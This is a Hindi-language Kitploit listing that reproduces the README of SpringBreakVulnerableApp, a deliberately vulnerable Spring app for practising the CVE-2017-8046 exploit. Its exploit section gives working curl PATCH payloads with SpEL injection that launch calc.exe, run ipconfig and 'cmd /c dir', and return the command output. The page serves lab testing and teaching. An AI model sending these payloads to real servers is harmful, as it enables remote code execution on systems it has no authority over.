Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SpringBreakVulnerableApp — चेतावनी: यह Spring Break भेद्यता (CVE-2017-8046) के शोषण का परीक्षण करने के लिए एक असुरक्षित एप्लिकेशन है। इसे अपने जोखिम पर चलाएँ! | Kitploit
उपकरण/GitHubGitHub/m3ssap0/springbreakvulnerableapp
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubm3ssap0/springbreakvulnerableapp

SpringBreakVulnerableApp

चेतावनी: यह Spring Break भेद्यता (CVE-2017-8046) के शोषण का परीक्षण करने के लिए एक असुरक्षित एप्लिकेशन है। इसे अपने जोखिम पर चलाएँ!

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
14107 साल पहलेअभी तक समीक्षित नहीं

स्प्रिंग ब्रेक कमजोर एप्लिकेशन

यह स्प्रिंग ब्रेक कमजोरी (CVE-2017-8046) के लिए exploit परीक्षण करने हेतु एक कमजोर एप्लिकेशन है।

चेतावनी!

इस एप्लिकेशन में गंभीर सुरक्षा कमजोरियाँ हैं। इसे अपने जोखिम पर चलाएँ! अनुशंसा की जाती है कि बैकअप और संरक्षित वातावरण (जैसे कि हालिया स्नैपशॉट और होस्ट-ओनली नेटवर्किंग वाला VM) का उपयोग करें। इस एप्लिकेशन को किसी भी इंटरनेट-फेसिंग सर्वर पर अपलोड न करें, क्योंकि वे समझौता हो जाएंगे।

अस्वीकरण: मैं इस एप्लिकेशन (SpringBreakVulnerableApp) के उपयोग के तरीके के लिए जिम्मेदार नहीं हूँ। इस एप्लिकेशन का एकमात्र उद्देश्य स्प्रिंग ब्रेक exploit के लिए एक परीक्षण परिदृश्य होना है और इसका दुर्भावनापूर्ण उपयोग नहीं किया जाना चाहिए। यदि आपका सर्वर SpringBreakVulnerableApp की स्थापना के माध्यम से समझौता किया जाता है, तो यह मेरी जिम्मेदारी नहीं है, यह उस व्यक्ति(व्यक्तियों) की जिम्मेदारी है जिसने इसे अपलोड और स्थापित किया।

कमजोरी की जानकारी

  • CVE-ID: CVE-2017-8046
  • लिंक: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
  • विवरण: Pivotal Spring Data REST के 2.5.12, 2.6.7, 3.0 RC3 से पहले के संस्करणों, Spring Boot के 2.0.0M4 से पहले के संस्करणों, और Kay-RC3 से पहले के Spring Data रिलीज़ ट्रेनों में spring-data-rest सर्वरों को भेजे गए दुर्भावनापूर्ण PATCH अनुरोध विशेष रूप से तैयार किए गए JSON डेटा का उपयोग करके मनमाना Java कोड चला सकते हैं।

उपयोग

एप्लिकेशन को निम्नलिखित Maven कमांड से लॉन्च किया जा सकता है।

root@kitploit:~
mvn spring-boot:run

एक फैट jar निम्नलिखित Maven कमांड से उत्पन्न किया जा सकता है।

root@kitploit:~
mvn clean install spring-boot:repackage

डेटा डालने के लिए आप निम्नलिखित curl कमांड का उपयोग कर सकते हैं।

root@kitploit:~
curl -i -X POST -H "Content-Type: application/json" -d '{ "name" : "Test", "attribute" : "foo"}' http://hostname:port/entity

एक्सप्लॉइट

संभवतः सबसे सरल एक्सप्लॉइट निम्नलिखित अनुरोध है।

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Thread).sleep(10000).x", "value" : "pwned" }]' "http://hostname:port/entity/1"

Windows पर, निम्नलिखित अनुरोध से calc.exe प्रक्रिया लॉन्च की जा सकती है। समान अनुरोधों का उपयोग मनमानी कमांड लॉन्च करने के लिए किया जा सकता है।

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Runtime).getRuntime().exec(\"calc.exe\").x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

लॉन्च की गई कमांड का आउटपुट प्राप्त करने के लिए, Spring Framework कोड द्वारा प्रदान किए गए कुछ "गैजेट्स" का उपयोग किया जा सकता है। सौभाग्य से, किसी बाहरी निर्भरता की आवश्यकता नहीं है। उदाहरण के लिए, ipconfig कमांड का परिणाम निम्नलिखित अनुरोध से प्राप्त किया जा सकता है।

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ipconfig\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

Windows पर, cmd /c dir कमांड, और इसी तरह की अन्य कमांड, निम्नलिखित अनुरोध से लॉन्च की जा सकती हैं। कृपया स्लैश कैरेक्टर को स्पष्ट मान से बचाने के लिए उपयोग की गई तरकीब पर ध्यान दें (अर्थात वास्तविक पार्सिंग से पहले स्पष्ट स्लैश को डॉट्स से बदल दिया जाता है)।

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"cmd \" + T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F)) + \"c dir\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

इस कमजोरी के शोषण के लिए एक Java प्रोग्राम यहाँ पाया जा सकता है।

लेखक

  • Antonio Francesco Sardella - कार्यान्वयन - m3ssap0

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE.txt फ़ाइल देखें।

आभार

  • Man Yue Mo वह सुरक्षा शोधकर्ता जिसने कमजोरी की खोज की
टूल डाउनलोड करें